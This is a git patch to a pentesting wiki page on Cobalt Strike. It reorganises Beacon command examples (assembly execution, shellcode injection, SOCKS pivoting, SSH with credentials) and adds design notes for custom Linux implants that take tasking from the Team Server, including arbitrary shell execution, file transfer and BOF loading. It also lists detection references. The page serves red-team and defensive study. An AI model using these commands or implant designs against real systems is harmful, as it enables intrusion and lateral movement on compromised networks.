From 1ce2fbdbcc393472f11baea1dda0997a910c5680 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Fri, 13 Feb 2026 02:07:05 +0000
Subject: [PATCH] Add content from: Cobalt Strike Linux Beacon

---
 src/windows-hardening/cobalt-strike.md | 35 +++++++++++++++++++++++---
 1 file changed, 31 insertions(+), 4 deletions(-)

diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index fa592f56d21..b9ba3ae03b9 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -38,7 +38,11 @@ If you already has the file you want to host in a web sever just go to `Attacks
 
 ### Beacon Options
 
-<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
+<details>
+<summary>Beacon options and commands</summary>
+
+```bash
+# Execute local .NET binary
 execute-assembly </path/to/executable.exe>
 # Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be modified.
 
@@ -185,7 +189,18 @@ shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 pro
 beacon> socks 1080
 
 # SSH connection
-beacon> ssh 10.10.17.12:22 username password</code></pre>
+beacon> ssh 10.10.17.12:22 username password
+```
+
+</details>
+
+### Custom implants / Linux Beacons
+
+- A custom agent only needs to speak the Cobalt Strike Team Server HTTP/S protocol (default malleable C2 profile) to register/check-in and receive tasks. Implement the same URIs/headers/metadata crypto defined in the profile to reuse the Cobalt Strike UI for tasking and output.
+- An Aggressor Script (e.g., `CustomBeacon.cna`) can wrap payload generation for the non-Windows beacon so operators can select the listener and produce ELF payloads directly from the GUI.
+- Example Linux task handlers exposed to the Team Server: `sleep`, `cd`, `pwd`, `shell` (exec arbitrary commands), `ls`, `upload`, `download`, and `exit`. These map to task IDs expected by the Team Server and must be implemented server-side to return output in the proper format.
+- BOF support on Linux can be added by loading Beacon Object Files in-process with [TrustedSec's ELFLoader](https://github.com/trustedsec/ELFLoader) (supports Outflank-style BOFs too), allowing modular post-exploitation to run inside the implant's context/privileges without spawning new processes.
+- Embed a SOCKS handler in the custom beacon to keep pivoting parity with Windows Beacons: when the operator runs `socks <port>` the implant should open a local proxy to route operator tooling through the compromised Linux host into internal networks.
 
 ## Opsec
 
@@ -196,7 +211,6 @@ The **`execute-assembly`** uses a **sacrificial process** using remote process i
 - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
 - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
 - In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET)
-- [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
 
 The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy.
 
@@ -292,7 +306,6 @@ Moreover, sometimes to do a pass-the.hash or pass-the-ticket attack it's stealth
 
 However, you need to be **careful with the generated traffic**, as you might be sending uncommon traffic (kerberos?) from your backdoor process. For this you could pivot to a browser process (although you could get caught injecting yourself into a process so think about a stealth way to do this).
 
-```bash
 
 ### Avoiding AVs
 
@@ -349,6 +362,9 @@ You could also check with functions are hooked with [**https://github.com/Mr-Un1
 
 
 
+<details>
+<summary>Misc Cobalt Strike commands</summary>
+
 ```bash
 cd C:\Tools\neo4j\bin
 neo4j.bat console
@@ -371,5 +387,16 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 
 ```
 
+</details>
+
+## References
+
+- [Cobalt Strike Linux Beacon (custom implant PoC)](https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon)
+- [TrustedSec ELFLoader & Linux BOFs](https://github.com/trustedsec/ELFLoader)
+- [Outflank nix BOF template](https://github.com/outflanknl/nix_bof_template)
+- [Unit42 analysis of Cobalt Strike metadata encryption](https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/)
+- [SANS ISC diary on Cobalt Strike traffic](https://isc.sans.edu/diary/27968)
+- [cs-decrypt-metadata-py](https://blog.didierstevens.com/2021/10/22/new-tool-cs-decrypt-metadata-py/)
+- [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser)
 
 {{#include ../banners/hacktricks-training.md}}